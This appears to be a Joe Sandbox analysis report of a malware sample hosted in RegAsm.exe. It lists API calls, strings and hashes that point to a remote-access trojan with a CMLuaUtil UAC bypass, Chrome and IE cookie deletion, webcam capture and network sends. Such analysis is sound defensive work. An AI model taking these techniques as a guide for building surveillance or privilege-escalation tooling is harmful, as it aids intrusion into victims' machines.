• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: Enum$InfoQueryValue
• String ID: [regsplt]$xUG$TG
• API String ID: 3554306468-1165877943
• Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
• Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
• Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
• Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
• WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
• WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
• _free.LIBCMT ref: 0044943D
  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
• _free.LIBCMT ref: 00449609
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
• String ID: t'`/
• API String ID: 1286116820-2084328917
• Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
• Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
• Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
• Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                                                                                  • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                                                                  • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                  • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                                  • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                                                                                                                                                                    • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                                                                                                    • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                                                                                  • String ID: xUG$NG$NG$TG
                                                                                                                                                                                                  • API String ID: 3114080316-2811732169
                                                                                                                                                                                                  • Opcode ID: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                                                                                                                                                                                  • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 269201875-2084328917
                                                                                                                                                                                                  • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                                                                                  • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                  • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                                  • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                                                                                                                                  • __freea.LIBCMT ref: 0045129D
                                                                                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 313313983-2084328917
                                                                                                                                                                                                  • Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                                                                                                                                                  • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                                                                                                                                    • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                                                                                                                    • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                                                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0041B7F4
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                                                                                  • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                                                                  • API String ID: 3286818993-122982132
                                                                                                                                                                                                  • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                                                                                  • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                                                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                                                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                                                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                                                                                  • API String ID: 1133728706-4073444585
                                                                                                                                                                                                  • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                                                                                                                                  • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                                                                                                                  • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                                                                  • _free.LIBCMT ref: 100092AB
                                                                                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                  • _free.LIBCMT ref: 100092B6
                                                                                                                                                                                                  • _free.LIBCMT ref: 100092C1
                                                                                                                                                                                                  • _free.LIBCMT ref: 10009315
                                                                                                                                                                                                  • _free.LIBCMT ref: 10009320
                                                                                                                                                                                                  • _free.LIBCMT ref: 1000932B
                                                                                                                                                                                                  • _free.LIBCMT ref: 10009336
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                  • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                                                                                                                                  • _free.LIBCMT ref: 00450FC8
                                                                                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                                  • _free.LIBCMT ref: 00450FD3
                                                                                                                                                                                                  • _free.LIBCMT ref: 00450FDE
                                                                                                                                                                                                  • _free.LIBCMT ref: 00451032
                                                                                                                                                                                                  • _free.LIBCMT ref: 0045103D
                                                                                                                                                                                                  • _free.LIBCMT ref: 00451048
                                                                                                                                                                                                  • _free.LIBCMT ref: 00451053
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                                                  • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                                                                                                                                  • int.LIBCPMT ref: 004111BE
                                                                                                                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                                  • String ID: (mG
                                                                                                                                                                                                  • API String ID: 2536120697-4059303827
                                                                                                                                                                                                  • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                                                                                                                  • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
  • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
  • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
• CoUninitialize.OLE32 ref: 00407664
Strings
Yara matches
Similarity
• API ID: InitializeObjectUninitialize_wcslen
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
• API String ID: 3851391207-1839356972
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
• GetLastError.KERNEL32 ref: 0040BB22
Strings
• [Chrome Cookies found, cleared!], xrefs: 0040BB48
• [Chrome Cookies not found], xrefs: 0040BB3C
• UserProfile, xrefs: 0040BAE8
• \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
Yara matches
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
• API String ID: 2018770650-304995407
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
• GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
• FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
Strings
Yara matches
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll$t'`/
• API String ID: 4061214504-2890722535
APIs
• __allrem.LIBCMT ref: 0043ACE9
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
• __allrem.LIBCMT ref: 0043AD1C
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
• __allrem.LIBCMT ref: 0043AD51
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
Yara matches
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
APIs
• Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
Strings
Yara matches
Similarity
• API ID: H_prologSleep
• String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
• API String ID: 3469354165-3054508432
APIs
Yara matches
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
APIs
• _strlen.LIBCMT ref: 10001607
• _strcat.LIBCMT ref: 1000161D
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
• lstrcatW.KERNEL32(?,?), ref: 1000165A
• lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
• lstrcatW.KERNEL32(00001008,?), ref: 10001686
Memory Dump Source
• Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: lstrcatlstrlen$_strcat_strlen
• String ID:
• API String ID: 1922816806-0
• Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
• Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
• Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
• Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
APIs
